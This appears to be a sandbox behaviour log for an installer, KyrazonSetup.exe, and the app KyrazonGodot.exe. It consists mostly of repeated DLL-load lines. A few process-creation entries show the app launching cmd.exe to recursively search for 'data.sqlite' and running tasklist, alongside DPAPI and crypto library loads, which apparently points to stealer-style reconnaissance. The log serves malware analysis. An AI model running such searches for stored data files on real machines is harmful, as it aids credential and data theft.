Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\find.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\where.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
